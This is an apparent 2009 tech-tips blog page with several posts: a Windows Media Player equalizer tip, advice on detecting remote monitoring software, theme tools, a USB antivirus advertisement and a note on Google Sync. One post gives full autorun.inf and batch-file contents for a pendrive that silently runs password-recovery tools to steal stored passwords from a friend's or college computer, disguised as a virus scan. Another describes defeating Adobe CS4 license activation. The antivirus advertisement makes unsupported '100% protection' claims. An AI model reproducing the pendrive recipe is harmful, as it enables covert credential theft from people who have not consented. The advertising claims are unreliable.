WELCOME GUEST ENJOY YOUR STAY HERE...

TELL A FRIEND ABOUT US.. Share/Save/Bookmark
Showing posts with label software. Show all posts
Showing posts with label software. Show all posts

Wednesday, September 9, 2009

Enable Equalizer in Windows media Player 12

We all know that the next version of Windows Media Player , which is WMP12 , comes with the upcoming OS from Microsoft, Windows 7. I happened to install the first beta, and when I tried to set the equalizer in WMP12 , I couldn't find it anywhere.
I searched every menu and preferences, but it wasn't there in any of them. Just when I thought its not there in the beta version, I finally saw the Graphic Equalizer button, in a tricky way!
It is a bit tricky, but it is possible to get the equalizer in Windows Media Player 12. If you are also one of those looking for the equalizer in WMP 12 , follow the steps below to get one.
1. Open Windows Media Player 12 in Library View (Default View).
2. Press Alt to get the menu, and navigate to View > Skin Chooser.


3. Select 'Revert' skin from the skins list (left side) and press the "Apply Button" button.


4 . You can now see the "Graphic Equalizer" button at the bottom right of the skinned WMP12.


5 . Set the default equalizer options to whatever you like.


Unfortunately, I couldn't find any way to enable the SRS- WOW effects. May be they haven't included them in the beta version.

How to detect computer & email monitoring or spying software

Computer Monitoring
So now, if you still think someone is spying on you, here's what you can do! The good thing right now is that neither Windows XP SP3 nor Windows Vista support multiple concurrent connections while someone is logged into the console (there is a hack for this, but I would not worry about). What this means is that if you're logged into your XP or Vista computer (like you are now if you're reading this), and someone were to connect to it using the BUILT-IN REMOTE DESKTOP feature of Windows, your screen would become locked and it would tell tell you who is connected. So why is that useful? It's useful because it means that in order for someone to connect to YOUR session without you noticing or your screen being taken over, they have use third-party software and it's a lot easier to detect third-party software than a normal process in Windows. So now we're looking for third-party software, which is usually referred to as remote control software or virtual network computing (VNC) software. First, the easy thing to do is to simply check in your Start Menu All Programs and check whether or not something like VNC, RealVNC, TightVNC, UltraVNC, LogMeIn, GoToMyPC, etc is installed. A lot of times IT people are sloppy and figure that a normal user won't know what a piece of software is and will simply ignore it. If any of those programs are installed, then someone can connect to your computer without you knowing it as long as the program is running in the background as a Windows service. That brings us to the second point. Usually, if one of the above listed programs are installed, there will be an icon for it in the task bar because it needs to be constantly running to work.
Check all of your icons (even the hidden ones) and see what is running. If you find something you've not heard of, do a quick Google search to see what pops up. It's usually quite hard to remove something from the taskbar, so if there is something installed to monitor your computer, it should be there. However, if someone really sneaky installed it and nothing shows up there, you can try another way. Again, because these are third-party apps, they have to connect to Windows XP or Vista on different communication ports. Ports are simply a virtual data connection by which computers share information directly. As you may already know, XP and Vista come with a built-in Firewall that blocks many of the incoming ports for security reasons. If you're not running an FTP site, why should your port 23 be open, right? So in order for these third-party apps to connect to your computer, they must come through a port, which has to be open on your computer. You can check all the open ports by going to Start , Control Panel , and Windows Firewall .
Click on the Exceptions tab and you'll see see a list of programs with check boxes next to them. The ones that are checked are "open" and the unchecked or unlisted ones are "closed". Go through the list and see if there is a program you're not familiar with or that matches VNC, remote control, etc. If so, you can block the program by un-checking the box for it!
The only other way I can think of to see if someone is connected to your computer is to see if there are any processes running under a different name! If you go to the Windows Task Manager (press Cntr + Shift + Esc together) and go to the Processes tab, you'll see a column titled User Name .
Scroll through all the processes and you should only see your user name, Local Service, Network Service, and System. Anything else means someone is logged into the computer!
Email & Web Site Monitoring
To check whether your email is being monitored is quite simple. Always, when you send an email from Outlook or some email client on your computer, it has to connect to the email server. Now it can either connect directly or it can connect through what is called a proxy server, which takes a request, alters or checks it, and forwards it on to another server. If you're going through a proxy server for email or web browsing, than the web sites you access or the emails you write can be saved and viewed later on. You can check for both and here's how. For IE, go to Tools , then Internet Options . Click on the Connections tab and choose LAN Settings .
If the Proxy Server box is checked and it has a local IP address with a port number, then that means you're going through a local server first before it reaches the web server. This means that any web site you visit first goes through another server running some kind of software that either blocks the address or simply logs it. For your email, you're checking for the same thing, a local IP address for the POP and SMTP mail servers. To check in Outlook, go to Tools , Email Accounts , and click Change or Properties, and find the values for POP and SMTP server.
If you're working in a big corporate environment, it's more than likely that the Internet and email are being monitored. You should always be careful in writing emails or browsing web sites while at the office. Trying to break through the security also might get you in trouble if they find out you bypassed their systems!

Create Custom Desktop Themes

Learn to create custom themes for your desktop through three fantastic tutorials. First up we have RocketDock which allows you to bring Mac OS X to your PC. You can create your own icons, manage programs, it's completely customizable and easy to use.

Next up we have Samurize , another solution for desktop customization. It allows you to monitor various aspects of your PC through widgets along with plenty of other features.

Finally, we have a step by step guide which guides you through the process of creating your own themes

Protect your Computer from USB Virus

Have you ever attached a USB to a computer and later found out that the Computer is infected by a virus? I have definitely faced this situation many times. If you attach your infected USB drive to the infected computer the virus is transferred to the Computer in no time infecting all the important documents. But now you don't have to worry about any USB Virus because USB Disk Security provides 100 % protection against any threats via USB drive. USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You pay USB Disk Security once and get it all, however, other antivirus products should be paid for updates every year.
Product Highlights: 100 % protection against any malicious programs via USB storage USB Disk Security uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection. USB Disk Security is the world's best software to block threats via USB drive. The best solution to protect offline computer Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences. USB Disk Security uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses. The world's fastest and smallest antivirus software With USB Disk Security, it's not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you'll discover that USB Disk Security is by far one of the smallest applications in the industry. For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM. 100% compatible with all software Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning. However, USB Disk Security is 100% compatible with all software, including Windows Vista. Simple to use USB Disk Security has been specifically designed to perform effectively regardless of the user's level of computer expertise. Just install and forget it. System Requirement 100 MHz Processor or more, 16 MB RAM or more. The operating system should be Windows 95 , Windows 98 , Windows 2000 , Windows XP, Windows NT 4.0, Windows ME, or Vista. Download
http://w17 .easy-share.com/ 1702778903 .html

Thursday, August 27, 2009

Hack Passwords Using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4 .x/2003 , AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. il PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002 /2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Google Sync for Mobile

Google Sync mainly used in Mobile phones and it began synchronising its free online calendars abd Gmail contact lists with smart phones using softwares licensed from arch- rival Microsoft.
Google Sync updates the Calendars and Gmail contacts in Iphones orWindow-based mobile devices to match changes users make using computers online and others...
Sync uses "push technology" so many changes or addition to your calendar or contacts are reflected in your device in minutes,Google Mobile Engineer Bryan Mawhinney wrote in California's site.
It uses two-way service so that you make changes in Mobile and in Google account.
It goes by wireless connection, so that if phone gets lost the calendar and other information are storeb by Google.

Friday, August 21, 2009

Crackers Beat Adobe CS4 License Activation Using A Simple Novice Trick

There is no doubt that cracker's always tend to be one step ahead of software creators, no matter how tough the software protection is they always come up with a method to bypass it sooner or later, But, Adobe seems to be very unlucky with their CS4 product release, first it was the Photoshop CS4 leak and now Adobe Creative Suite 4 got cracked and keygened within three days of its initial release, massive sized trial version of Adobe CS4 suite with crack patches made their way on torrent portals and file-sharing websites within days after release.


Adobe CS4 makes use of a license activation system to make Keygens and shared serial-number obsolete by blacklisting them via a central activation server, Surprisingly, smart crackers defeated the whole CS4 activation system using a simple trick, blocking access to the activation server using Windows or MAC HOSTS file .
After generating the key using the keygen, users simply need to block access to activate.adobe.com using their firewalls or Windows HOSTS file, effectively disabling the CS4 licensing system from verifying the registration serial-key.

Follow Me... Stay Connected

MY STATS

Top Blogs

Learn hacking tips tricks earn online hints cheats

Blog Directory & Search engine

blogarama - the blog directory

BlogsByCategory.com

Technology Blogs - Blog Rankings

Visit blogadda.com to discover Indian blogs

Computers

Computers Blogs